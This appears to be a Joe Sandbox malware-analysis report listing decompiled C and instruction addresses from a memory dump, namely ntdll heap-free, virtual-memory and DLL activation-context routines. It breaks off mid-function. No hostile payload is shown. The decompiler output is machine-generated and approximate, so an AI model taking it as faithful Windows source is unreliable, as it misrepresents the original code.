                                                    0x017daaab
                                                    0x017daaaf
                                                    0x00000000
                                                    0x017daab5
                                                    0x00000000
                                                    0x017daab5
                                                    0x017da9d7
                                                    0x017da9d7
                                                    0x017da9da
                                                    0x017da9e0
                                                    0x017da9e3
                                                    0x017da9e6
                                                    0x017da9e9
                                                    0x017da9eb
                                                    0x017da9fd
                                                    0x017da9fd
                                                    0x00000000
                                                    0x017da9eb
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x017da983
                                                    0x017da983
                                                    0x017da983
                                                    0x017da987
                                                    0x017da995
                                                    0x017da995
                                                    0x017da995
                                                    0x017da995
                                                    0x017da989
                                                    0x017da98e
                                                    0x00000000
                                                    0x017da990
                                                    0x00000000
                                                    0x017da990
                                                    0x017da98e
                                                    0x00000000
                                                    0x017da983
                                                    0x017da972
                                                    0x017da90a
                                                    0x017daa34
                                                    0x017daa34
                                                    0x017daa40
                                                    0x017daa43
                                                    0x017daa46
                                                    0x017daa4d
                                                    0x018223ab
                                                    0x018223b2
                                                    0x018223b8
                                                    0x018223be
                                                    0x018223c3
                                                    0x018223c5
                                                    0x018223cb
                                                    0x018223d1
                                                    0x018223d5
                                                    0x018223f6
                                                    0x018223fb
                                                    0x018223d7
                                                    0x018223ec
                                                    0x018223f1
                                                    0x01822403
                                                    0x01822408
                                                    0x01822410
                                                    0x01822417
                                                    0x01822422
                                                    0x01822422
                                                    0x01822417
                                                    0x018223c5
                                                    0x018223b2
                                                    0x00000000

                                                    Strings
                                                    • ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock, xrefs: 01822403
                                                    • ((FreeBlock->Flags & HEAP_ENTRY_DECOMMITTED) || (ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock)), xrefs: 018222F3
                                                    • HEAP[%wZ]: , xrefs: 018222D7, 018223E7
                                                    • HEAP: , xrefs: 018222E6, 018223F6
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.578840011.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01790000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_1790000_P5348574_74676.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: ((FreeBlock->Flags & HEAP_ENTRY_DECOMMITTED) || (ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock))$HEAP: $HEAP[%wZ]: $ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock
                                                    • API String ID: 0-1657114761
                                                    • Opcode ID: eed070ce38098089d384c58398029284dcd664fce761829e7491200c1a0e792d
                                                    • Instruction ID: abb3b3c7f7880c254499f86f13d84635aa039bf02aded3a1dfbc71d18ed56744
                                                    • Opcode Fuzzy Hash: eed070ce38098089d384c58398029284dcd664fce761829e7491200c1a0e792d
                                                    • Instruction Fuzzy Hash: 2BD1B074A0024A8FDB19CF68C494BBAFBF2FF88300F158569D9569B346E334EA45CB51
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 017DA229 Relevance: 5.2, Strings: 4, Instructions: 183COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 69%
                                                    			E017DA229(void* __ecx, void* __edx) {
				signed int _v20;
				char _v24;
				char _v28;
				void* _v44;
				void* _v48;
				void* _v56;
				void* _v60;
				void* __ebx;
				signed int _t55;
				signed int _t57;
				void* _t61;
				intOrPtr _t62;
				void* _t65;
				void* _t71;
				signed char* _t74;
				intOrPtr _t75;
				signed char* _t80;
				intOrPtr _t81;
				void* _t82;
				signed char* _t85;
				signed char _t91;
				void* _t103;
				void* _t105;
				void* _t121;
				void* _t129;
				signed int _t131;
				void* _t133;

				_t105 = __ecx;
				_t133 = (_t131 & 0xfffffff8) - 0x1c;
				_t103 = __edx;
				_t129 = __ecx;
				E017DDF24(__edx,  &_v28, _t133);
				_t55 =  *(_t129 + 0x40) & 0x00040000;
				asm("sbb edi, edi");
				_t121 = ( ~_t55 & 0x0000003c) + 4;
				if(_t55 != 0) {
					_push(0);
					_push(0x14);
					_push( &_v24);
					_push(3);
					_push(_t129);
					_push(0xffffffff);
					_t57 = E017F9730();
					__eflags = _t57;
					if(_t57 < 0) {
						L17:
						_push(_t105);
						E0187A80D(_t129, 1, _v20, 0);
						_t121 = 4;
						goto L1;
					}
					__eflags = _v20 & 0x00000060;
					if((_v20 & 0x00000060) == 0) {
						goto L17;
					}
					__eflags = _v24 - _t129;
					if(_v24 == _t129) {
						goto L1;
					}
					goto L17;
				}
				L1:
				_push(_t121);
				_push(0x1000);
				_push(_t133 + 0x14);
				_push(0);
				_push(_t133 + 0x20);
				_push(0xffffffff);
				_t61 = E017F9660();
				_t122 = _t61;
				if(_t61 < 0) {
					_t62 =  *[fs:0x30];
					 *((intOrPtr*)(_t129 + 0x218)) =  *((intOrPtr*)(_t129 + 0x218)) + 1;
					__eflags =  *(_t62 + 0xc);
					if( *(_t62 + 0xc) == 0) {
						_push("HEAP: ");
						E017BB150();
					} else {
						E017BB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					_push( *((intOrPtr*)(_t133 + 0xc)));
					_push( *((intOrPtr*)(_t133 + 0x14)));
					_push(_t129);
					E017BB150("ZwAllocateVirtualMemory failed %lx for heap %p (base %p, size %Ix)\n", _t122);
					_t65 = 0;
					L13:
					return _t65;
				}
				_t71 = E017D7D50();
				_t124 = 0x7ffe0380;
				if(_t71 != 0) {
					_t74 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
				} else {
					_t74 = 0x7ffe0380;
				}
				if( *_t74 != 0) {
					_t75 =  *[fs:0x30];
					__eflags =  *(_t75 + 0x240) & 0x00000001;
					if(( *(_t75 + 0x240) & 0x00000001) != 0) {
						E0187138A(_t103, _t129,  *((intOrPtr*)(_t133 + 0x10)),  *((intOrPtr*)(_t133 + 0x10)), 8);
					}
				}
				 *((intOrPtr*)(_t129 + 0x230)) =  *((intOrPtr*)(_t129 + 0x230)) - 1;
				 *((intOrPtr*)(_t129 + 0x234)) =  *((intOrPtr*)(_t129 + 0x234)) -  *((intOrPtr*)(_t133 + 0xc));
				if(E017D7D50() != 0) {
					_t80 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
				} else {
					_t80 = _t124;
				}
				if( *_t80 != 0) {
					_t81 =  *[fs:0x30];
					__eflags =  *(_t81 + 0x240) & 0x00000001;
					if(( *(_t81 + 0x240) & 0x00000001) != 0) {
						__eflags = E017D7D50();
						if(__eflags != 0) {
							_t124 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
							__eflags =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
						}
						E01871582(_t103, _t129,  *((intOrPtr*)(_t133 + 0x10)), __eflags,  *((intOrPtr*)(_t133 + 0x14)),  *(_t129 + 0x74) << 3,  *_t124 & 0x000000ff);
					}
				}
				_t82 = E017D7D50();
				_t125 = 0x7ffe038a;
				if(_t82 != 0) {
					_t85 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
				} else {
					_t85 = 0x7ffe038a;
				}
				if( *_t85 != 0) {
					__eflags = E017D7D50();
					if(__eflags != 0) {
						_t125 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
						__eflags =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
					}
					E01871582(_t103, _t129,  *((intOrPtr*)(_t133 + 0x10)), __eflags,  *((intOrPtr*)(_t133 + 0x14)),  *(_t129 + 0x74) << 3,  *_t125 & 0x000000ff);
				}
				 *((intOrPtr*)(_t129 + 0x20c)) =  *((intOrPtr*)(_t129 + 0x20c)) + 1;
				_t91 =  *(_t103 + 2);
				if((_t91 & 0x00000004) != 0) {
					E0180D5E0( *((intOrPtr*)(_t133 + 0x18)),  *((intOrPtr*)(_t133 + 0x10)), 0xfeeefeee);
					_t91 =  *(_t103 + 2);
				}
				 *(_t103 + 2) = _t91 & 0x00000017;
				_t65 = 1;
				goto L13;
			}






























                                                    0x017da229
                                                    0x017da231
                                                    0x017da23f
                                                    0x017da242
                                                    0x017da244
                                                    0x017da24c
                                                    0x017da255
                                                    0x017da25a
                                                    0x017da25f
                                                    0x01821c76
                                                    0x01821c78
                                                    0x01821c7e
                                                    0x01821c7f
                                                    0x01821c81
                                                    0x01821c82
                                                    0x01821c84
                                                    0x01821c89
                                                    0x01821c8b
                                                    0x01821c9e
                                                    0x01821c9e
                                                    0x01821cab
                                                    0x01821cb2
                                                    0x00000000
                                                    0x01821cb2
                                                    0x01821c8d
                                                    0x01821c92
                                                    0x00000000
                                                    0x00000000
                                                    0x01821c94
                                                    0x01821c98
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x01821c98
                                                    0x017da265
                                                    0x017da265
                                                    0x017da266
                                                    0x017da26f
                                                    0x017da270
                                                    0x017da276
                                                    0x017da277
                                                    0x017da279
                                                    0x017da27e
                                                    0x017da282
                                                    0x01821db5
                                                    0x01821dbb
                                                    0x01821dc1
                                                    0x01821dc5
                                                    0x01821de4
                                                    0x01821de9
                                                    0x01821dc7
                                                    0x01821ddc
                                                    0x01821de1
                                                    0x01821def
                                                    0x01821df3
                                                    0x01821df7
                                                    0x01821dfe
                                                    0x01821e06
                                                    0x017da302
                                                    0x017da308
                                                    0x017da308
                                                    0x017da288
                                                    0x017da28d
                                                    0x017da294
                                                    0x01821cc1
                                                    0x017da29a
                                                    0x017da29a
                                                    0x017da29a
                                                    0x017da29f
                                                    0x01821ccb
                                                    0x01821cd1
                                                    0x01821cd8
                                                    0x01821cea
                                                    0x01821cea
                                                    0x01821cd8
                                                    0x017da2a9
                                                    0x017da2af
                                                    0x017da2bc
                                                    0x01821cfd
                                                    0x017da2c2
                                                    0x017da2c2
                                                    0x017da2c2
                                                    0x017da2c7
                                                    0x01821d07
                                                    0x01821d0d
                                                    0x01821d14
                                                    0x01821d1f
                                                    0x01821d21
                                                    0x01821d2c
                                                    0x01821d2c
                                                    0x01821d2c
                                                    0x01821d47
                                                    0x01821d47
                                                    0x01821d14
                                                    0x017da2cd
                                                    0x017da2d2
                                                    0x017da2d9
                                                    0x01821d5a
                                                    0x017da2df
                                                    0x017da2df
                                                    0x017da2df
                                                    0x017da2e4
                                                    0x01821d69
                                                    0x01821d6b
                                                    0x01821d76
                                                    0x01821d76
                                                    0x01821d76
                                                    0x01821d91
                                                    0x01821d91
                                                    0x017da2ea
                                                    0x017da2f0
                                                    0x017da2f5
                                                    0x01821da8
                                                    0x01821dad
                                                    0x01821dad
                                                    0x017da2fd
                                                    0x017da300
                                                    0x00000000

                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.578840011.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01790000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_1790000_P5348574_74676.jbxd
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID: HEAP: $HEAP[%wZ]: $ZwAllocateVirtualMemory failed %lx for heap %p (base %p, size %Ix)$`
                                                    • API String ID: 2994545307-2586055223
                                                    • Opcode ID: e707546a2e0ea5dae0dbe37fa525864fc5e1966dab89cb175e6723ca10a9b30b
                                                    • Instruction ID: a0a5751ca244923b2e40da485009b28f3e6bb7fbb0d110c34dd23a44b07708e8
                                                    • Opcode Fuzzy Hash: e707546a2e0ea5dae0dbe37fa525864fc5e1966dab89cb175e6723ca10a9b30b
                                                    • Instruction Fuzzy Hash: D45117722056959FE722DB69C848F67BBF8FF80B50F180568F951CB291D734EA40CB62
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 017E8E00 Relevance: 5.1, Strings: 4, Instructions: 126COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 44%
                                                    			E017E8E00(void* __ecx) {
				signed int _v8;
				char _v12;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t32;
				intOrPtr _t35;
				intOrPtr _t43;
				void* _t46;
				intOrPtr _t47;
				void* _t48;
				signed int _t49;
				void* _t50;
				intOrPtr* _t51;
				signed int _t52;
				void* _t53;
				intOrPtr _t55;

				_v8 =  *0x18ad360 ^ _t52;
				_t49 = 0;
				_t48 = __ecx;
				_t55 =  *0x18a8464; // 0x74720110
				if(_t55 == 0) {
					L9:
					if( !_t49 >= 0) {
						if(( *0x18a5780 & 0x00000003) != 0) {
							E01835510("minkernel\\ntdll\\ldrsnap.c", 0x2b5, "LdrpFindDllActivationContext", 0, "Querying the active activation context failed with status 0x%08lx\n", _t49);
						}
						if(( *0x18a5780 & 0x00000010) != 0) {
							asm("int3");
						}
					}
					return E017FB640(_t49, 0, _v8 ^ _t52, _t47, _t48, _t49);
				}
				_t47 =  *((intOrPtr*)(__ecx + 0x18));
				_t43 =  *0x18a7984; // 0x1282b58
				if( *((intOrPtr*)( *[fs:0x30] + 0x1f8)) == 0 || __ecx != _t43) {
					_t32 =  *((intOrPtr*)(_t48 + 0x28));
					if(_t48 == _t43) {
						_t50 = 0x5c;
						if( *_t32 == _t50) {
							_t46 = 0x3f;
							if( *((intOrPtr*)(_t32 + 2)) == _t46 &&  *((intOrPtr*)(_t32 + 4)) == _t46 &&  *((intOrPtr*)(_t32 + 6)) == _t50 &&  *((intOrPtr*)(_t32 + 8)) != 0 &&  *((short*)(_t32 + 0xa)) == 0x3a &&  *((intOrPtr*)(_t32 + 0xc)) == _t50) {
								_t32 = _t32 + 8;
							}
						}
					}
					_t51 =  *0x18a8464; // 0x74720110
					 *0x18ab1e0(_t47, _t32,  &_v12);
					_t49 =  *_t51();
					if(_t49 >= 0) {
						L8:
						_t35 = _v12;
						if(_t35 != 0) {
							if( *((intOrPtr*)(_t48 + 0x48)) != 0) {
								E017E9B10( *((intOrPtr*)(_t48 + 0x48)));
								_t35 = _v12;
							}
							 *((intOrPtr*)(_t48 + 0x48)) = _t35;
						}
						goto L9;
					}
					if(_t49 != 0xc000008a) {
						if(_t49 != 0xc000008b && _t49 != 0xc0000089 && _t49 != 0xc000000f && _t49 != 0xc0000204 && _t49 != 0xc0000002) {
							if(_t49 != 0xc00000bb) {
								goto L8;
							}
						}
					}
					if(( *0x18a5780 & 0x00000005) != 0) {
						_push(_t49);
						E01835510("minkernel\\ntdll\\ldrsnap.c", 0x298, "LdrpFindDllActivationContext", 2, "Probing for the manifest of DLL \"%wZ\" failed with status 0x%08lx\n", _t48 + 0x24);
						_t53 = _t53 + 0x1c;
					}
					_t49 = 0;
					goto L8;
				} else {
					goto L9;
				}
			}




















                                                    0x017e8e0f
                                                    0x017e8e16
                                                    0x017e8e19
                                                    0x017e8e1b
                                                    0x017e8e21
                                                    0x017e8e7f
                                                    0x017e8e85
                                                    0x01829354
                                                    0x0182936c
                                                    0x01829371
                                                    0x0182937b
                                                    0x01829381
                                                    0x01829381
                                                    0x0182937b
                                                    0x017e8e9d
                                                    0x017e8e9d
                                                    0x017e8e29
                                                    0x017e8e2c
                                                    0x017e8e38
                                                    0x017e8e3e
                                                    0x017e8e43
                                                    0x017e8eb5
                                                    0x017e8eb9
                                                    0x018292aa
                                                    0x018292af
                                                    0x018292e8
                                                    0x018292e8
                                                    0x018292af
                                                    0x017e8eb9
                                                    0x017e8e45
                                                    0x017e8e53
                                                    0x017e8e5b
                                                    0x017e8e5f
                                                    0x017e8e78
                                                    0x017e8e78
                                                    0x017e8e7d
                                                    0x017e8ec3
                                                    0x017e8ecd
                                                    0x017e8ed2
                                                    0x017e8ed2
                                                    0x017e8ec5
                                                    0x017e8ec5
                                                    0x00000000
                                                    0x017e8e7d
                                                    0x017e8e67
                                                    0x017e8ea4
                                                    0x0182931a
                                                    0x00000000
                                                    0x00000000
                                                    0x01829320
                                                    0x017e8ea4
                                                    0x017e8e70
                                                    0x01829325
                                                    0x01829340
                                                    0x01829345
                                                    0x01829345
                                                    0x017e8e76
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000

                                                    Strings
                                                    • Querying the active activation context failed with status 0x%08lx, xrefs: 01829357
                                                    • Probing for the manifest of DLL "%wZ" failed with status 0x%08lx, xrefs: 0182932A
                                                    • minkernel\ntdll\ldrsnap.c, xrefs: 0182933B, 01829367
                                                    • LdrpFindDllActivationContext, xrefs: 01829331, 0182935D
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.578840011.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01790000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_1790000_P5348574_74676.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: LdrpFindDllActivationContext$Probing for the manifest of DLL "%wZ" failed with status 0x%08lx$Querying the active activation context failed with status 0x%08lx$minkernel\ntdll\ldrsnap.c
                                                    • API String ID: 0-3779518884
                                                    • Opcode ID: e8041d7f6fb7c47b6d08be67815357a7db979e640b9525495037dcc74874a353
                                                    • Instruction ID: 8a88308293e43c90485e707d23eac6b60c357a458d3932b0e9d47671b49d94ad
                                                    • Opcode Fuzzy Hash: e8041d7f6fb7c47b6d08be67815357a7db979e640b9525495037dcc74874a353
                                                    • Instruction Fuzzy Hash: 03410772A003259FEF36AA5C888CA76F7F5AB0D358F49416AE90497151E7706EC087C3
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 018749A4 Relevance: 5.1, Strings: 4, Instructions: 114COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.578840011.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01790000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_1790000_P5348574_74676.jbxd
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID: This is located in the %s field of the heap header.$HEAP: $HEAP[%wZ]: $Heap %p - headers modified (%p is %lx instead of %lx)
                                                    • API String ID: 2994545307-336120773
                                                    • Opcode ID: 76e75d640870d6ed31b2a611d545c32d2979da08c8893763b6a663a303e2a322
                                                    • Instruction ID: 757e79d02b6a5f3cd989fc7b6e67419f1fdc347a1593177a92d1bdb951ef38a5
                                                    • Opcode Fuzzy Hash: 76e75d640870d6ed31b2a611d545c32d2979da08c8893763b6a663a303e2a322
                                                    • Instruction Fuzzy Hash: 9E312131200159EFD721EB9DC8CAFABF7A8EF00724F14415AF905CB251E674EA44CB69
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 017D99BF Relevance: 4.3, Strings: 3, Instructions: 572COMMONCrypto
                                                    Download Yara Rule
                                                    C-Code - Quality: 78%
                                                    			E017D99BF(signed int __ecx, signed short* __edx, signed int* _a4, signed int _a8) {
				char _v5;
				signed int _v12;
				signed int _v16;
				signed short _v20;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed short _t186;
				intOrPtr _t187;
				signed short _t190;
				signed int _t196;
				signed short _t197;
				intOrPtr _t203;
				signed int _t207;
				signed int _t210;
				signed short _t215;
				intOrPtr _t216;
				signed short _t219;
				signed int _t221;
				signed short _t222;
				intOrPtr _t228;
				signed int _t232;
				signed int _t235;
				signed int _t250;
				signed short _t251;
				intOrPtr _t252;
				signed short _t254;
				intOrPtr _t255;
				signed int _t258;
				signed int _t259;
				signed short _t262;
				intOrPtr _t271;
				signed int _t279;
				signed int _t282;
				signed int _t284;
				signed int _t286;
				intOrPtr _t292;
				signed int _t296;
				signed int _t299;
				signed int _t307;
				signed int* _t309;
				signed short* _t311;
				signed short* _t313;
				signed char _t314;
				intOrPtr _t316;
				signed int _t323;
				signed char _t328;
				signed short* _t330;
				signed char _t331;
				intOrPtr _t335;
				signed int _t342;
				signed char _t347;
				signed short* _t348;
				signed short* _t350;
				signed short _t352;
				signed char _t354;
				intOrPtr _t357;
				intOrPtr* _t364;
				signed char _t365;
				intOrPtr _t366;
				signed int _t373;
				signed char _t378;
				signed int* _t381;
				signed int _t382;
				signed short _t384;
				signed int _t386;
				unsigned int _t390;
				signed int _t393;
				signed int* _t394;
				unsigned int _t398;
				signed short _t400;
				signed short _t402;
				signed int _t404;
				signed int _t407;
				unsigned int _t411;
				signed short* _t414;
				signed int _t415;
				signed short* _t419;
				signed int* _t420;
				void* _t421;

				_t414 = __edx;
				_t307 = __ecx;
				_t419 = __edx - (( *(__edx + 4) & 0x0000ffff ^  *(__ecx + 0x54) & 0x0000ffff) << 3);
				if(_t419 == __edx || (( *(__ecx + 0x4c) >> 0x00000014 &  *(__ecx + 0x52) ^ _t419[1]) & 0x00000001) != 0) {
					_v5 = _a8;
					L3:
					_t381 = _a4;
					goto L4;
				} else {
					__eflags =  *(__ecx + 0x4c);
					if( *(__ecx + 0x4c) != 0) {
						_t411 =  *(__ecx + 0x50) ^  *_t419;
						 *_t419 = _t411;
						_t378 = _t411 >> 0x00000010 ^ _t411 >> 0x00000008 ^ _t411;
						__eflags = _t411 >> 0x18 - _t378;
						if(__eflags != 0) {
							_push(_t378);
							E0186FA2B(__ecx, __ecx, _t419, __edx, _t419, __eflags);
						}
					}
					_t250 = _a8;
					_v5 = _t250;
					__eflags = _t250;
					if(_t250 != 0) {
						_t400 = _t414[6];
						_t53 =  &(_t414[4]); // -16
						_t348 = _t53;
						_t251 =  *_t348;
						_v12 = _t251;
						_v16 = _t400;
						_t252 =  *((intOrPtr*)(_t251 + 4));
						__eflags =  *_t400 - _t252;
						if( *_t400 != _t252) {
							L49:
							_push(_t348);
							_push( *_t400);
							E0187A80D(_t307, 0xd, _t348, _t252);
							L50:
							_v5 = 0;
							goto L11;
						}
						__eflags =  *_t400 - _t348;
						if( *_t400 != _t348) {
							goto L49;
						}
						 *((intOrPtr*)(_t307 + 0x74)) =  *((intOrPtr*)(_t307 + 0x74)) - ( *_t414 & 0x0000ffff);
						_t407 =  *(_t307 + 0xb4);
						__eflags = _t407;
						if(_t407 == 0) {
							L36:
							_t364 = _v16;
							_t282 = _v12;
							 *_t364 = _t282;
							 *((intOrPtr*)(_t282 + 4)) = _t364;
							__eflags = _t414[1] & 0x00000008;
							if((_t414[1] & 0x00000008) == 0) {
								L39:
								_t365 = _t414[1];
								__eflags = _t365 & 0x00000004;
								if((_t365 & 0x00000004) != 0) {
									_t284 = ( *_t414 & 0x0000ffff) * 8 - 0x10;
									_v12 = _t284;
									__eflags = _t365 & 0x00000002;
									if((_t365 & 0x00000002) != 0) {
										__eflags = _t284 - 4;
										if(_t284 > 4) {
											_t284 = _t284 - 4;
											__eflags = _t284;
											_v12 = _t284;
										}
									}
									_t78 =  &(_t414[8]); // -8
									_t286 = E0180D540(_t78, _t284, 0xfeeefeee);
									_v16 = _t286;
									__eflags = _t286 - _v12;
									if(_t286 != _v12) {
										_t366 =  *[fs:0x30];
										__eflags =  *(_t366 + 0xc);
										if( *(_t366 + 0xc) == 0) {
											_push("HEAP: ");
											E017BB150();
										} else {
											E017BB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
										}
										_push(_v16 + 0x10 + _t414);
										E017BB150("HEAP: Free Heap block %p modified at %p after it was freed\n", _t414);
										_t292 =  *[fs:0x30];
										_t421 = _t421 + 0xc;
										__eflags =  *((char*)(_t292 + 2));
										if( *((char*)(_t292 + 2)) != 0) {
											 *0x18a6378 = 1;
											asm("int3");
											 *0x18a6378 = 0;
										}
									}
								}
								goto L50;
							}
							_t296 = E017DA229(_t307, _t414);
							__eflags = _t296;
							if(_t296 != 0) {
								goto L39;
							} else {
								E017DA309(_t307, _t414,  *_t414 & 0x0000ffff, 1);
								goto L50;
							}
						} else {
							_t373 =  *_t414 & 0x0000ffff;
							while(1) {
								__eflags = _t373 -  *((intOrPtr*)(_t407 + 4));
								if(_t373 <  *((intOrPtr*)(_t407 + 4))) {
									_t301 = _t373;
									break;
								}
								_t299 =  *_t407;
								__eflags = _t299;
								if(_t299 == 0) {
									_t301 =  *((intOrPtr*)(_t407 + 4)) - 1;
									__eflags =  *((intOrPtr*)(_t407 + 4)) - 1;
									break;
								} else {
									_t407 = _t299;
									continue;
								}
							}
							_t62 =  &(_t414[4]); // -16
							E017DBC04(_t307, _t407, 1, _t62, _t301, _t373);
							goto L36;
						}
					}
					L11:
					_t402 = _t419[6];
					_t25 =  &(_t419[4]); // -16
					_t350 = _t25;
					_t254 =  *_t350;
					_v12 = _t254;
					_v20 = _t402;
					_t255 =  *((intOrPtr*)(_t254 + 4));
					__eflags =  *_t402 - _t255;
					if( *_t402 != _t255) {
						L61:
						_push(_t350);
						_push( *_t402);
						E0187A80D(_t307, 0xd, _t350, _t255);
						goto L3;
					}
					__eflags =  *_t402 - _t350;
					if( *_t402 != _t350) {
						goto L61;
					}
					 *((intOrPtr*)(_t307 + 0x74)) =  *((intOrPtr*)(_t307 + 0x74)) - ( *_t419 & 0x0000ffff);
					_t404 =  *(_t307 + 0xb4);
					__eflags = _t404;
					if(_t404 == 0) {
						L20:
						_t352 = _v20;
						_t258 = _v12;
						 *_t352 = _t258;
						 *(_t258 + 4) = _t352;
						__eflags = _t419[1] & 0x00000008;
						if((_t419[1] & 0x00000008) != 0) {
							_t259 = E017DA229(_t307, _t419);
							__eflags = _t259;
							if(_t259 != 0) {
								goto L21;
							} else {
								E017DA309(_t307, _t419,  *_t419 & 0x0000ffff, 1);
								goto L3;
							}
						}
						L21:
						_t354 = _t419[1];
						__eflags = _t354 & 0x00000004;
						if((_t354 & 0x00000004) != 0) {
							_t415 = ( *_t419 & 0x0000ffff) * 8 - 0x10;
							__eflags = _t354 & 0x00000002;
							if((_t354 & 0x00000002) != 0) {
								__eflags = _t415 - 4;
								if(_t415 > 4) {
									_t415 = _t415 - 4;
									__eflags = _t415;
								}
							}
							_t91 =  &(_t419[8]); // -8
							_t262 = E0180D540(_t91, _t415, 0xfeeefeee);
							_v20 = _t262;
							__eflags = _t262 - _t415;
							if(_t262 != _t415) {
								_t357 =  *[fs:0x30];
								__eflags =  *(_t357 + 0xc);
								if( *(_t357 + 0xc) == 0) {
									_push("HEAP: ");
									E017BB150();
								} else {
									E017BB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
								}
								_push(_v20 + 0x10 + _t419);
								E017BB150("HEAP: Free Heap block %p modified at %p after it was freed\n", _t419);
								_t271 =  *[fs:0x30];
								_t421 = _t421 + 0xc;
								__eflags =  *((char*)(_t271 + 2));
								if( *((char*)(_t271 + 2)) != 0) {
									 *0x18a6378 = 1;
									asm("int3");
									 *0x18a6378 = 0;
								}
							}
						}
						_t381 = _a4;
						_t414 = _t419;
						_t419[1] = 0;
						_t419[3] = 0;
						 *_t381 =  *_t381 + ( *_t419 & 0x0000ffff);
						 *_t419 =  *_t381;
						 *(_t419 + 4 +  *_t381 * 8) =  *_t381 ^  *(_t307 + 0x54);
						L4:
						_t420 = _t414 +  *_t381 * 8;
						if( *(_t307 + 0x4c) == 0) {
							L6:
							while((( *(_t307 + 0x4c) >> 0x00000014 &  *(_t307 + 0x52) ^ _t420[0]) & 0x00000001) == 0) {
								__eflags =  *(_t307 + 0x4c);
								if( *(_t307 + 0x4c) != 0) {
									_t390 =  *(_t307 + 0x50) ^  *_t420;
									 *_t420 = _t390;
									_t328 = _t390 >> 0x00000010 ^ _t390 >> 0x00000008 ^ _t390;
									__eflags = _t390 >> 0x18 - _t328;
									if(__eflags != 0) {
										_push(_t328);
										E0186FA2B(_t307, _t307, _t420, _t414, _t420, __eflags);
									}
								}
								__eflags = _v5;
								if(_v5 == 0) {
									L94:
									_t382 = _t420[3];
									_t137 =  &(_t420[2]); // -16
									_t309 = _t137;
									_t186 =  *_t309;
									_v20 = _t186;
									_v16 = _t382;
									_t187 =  *((intOrPtr*)(_t186 + 4));
									__eflags =  *_t382 - _t187;
									if( *_t382 != _t187) {
										L63:
										_push(_t309);
										_push( *_t382);
										_push(_t187);
										_push(_t309);
										_push(0xd);
										L64:
										E0187A80D(_t307);
										continue;
									}
									__eflags =  *_t382 - _t309;
									if( *_t382 != _t309) {
										goto L63;
									}
									 *((intOrPtr*)(_t307 + 0x74)) =  *((intOrPtr*)(_t307 + 0x74)) - ( *_t420 & 0x0000ffff);
									_t393 =  *(_t307 + 0xb4);
									__eflags = _t393;
									if(_t393 == 0) {
										L104:
										_t330 = _v16;
										_t190 = _v20;
										 *_t330 = _t190;
										 *(_t190 + 4) = _t330;
										__eflags = _t420[0] & 0x00000008;
										if((_t420[0] & 0x00000008) == 0) {
											L107:
											_t331 = _t420[0];
											__eflags = _t331 & 0x00000004;
											if((_t331 & 0x00000004) != 0) {
												_t196 = ( *_t420 & 0x0000ffff) * 8 - 0x10;
												_v12 = _t196;
												__eflags = _t331 & 0x00000002;
												if((_t331 & 0x00000002) != 0) {
													__eflags = _t196 - 4;
													if(_t196 > 4) {
														_t196 = _t196 - 4;
														__eflags = _t196;
														_v12 = _t196;
													}
												}
												_t162 =  &(_t420[4]); // -8
												_t197 = E0180D540(_t162, _t196, 0xfeeefeee);
												_v20 = _t197;
												__eflags = _t197 - _v12;
												if(_t197 != _v12) {
													_t335 =  *[fs:0x30];
													__eflags =  *(_t335 + 0xc);
													if( *(_t335 + 0xc) == 0) {
														_push("HEAP: ");
														E017BB150();
													} else {
														E017BB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
													}
													_push(_v20 + 0x10 + _t420);
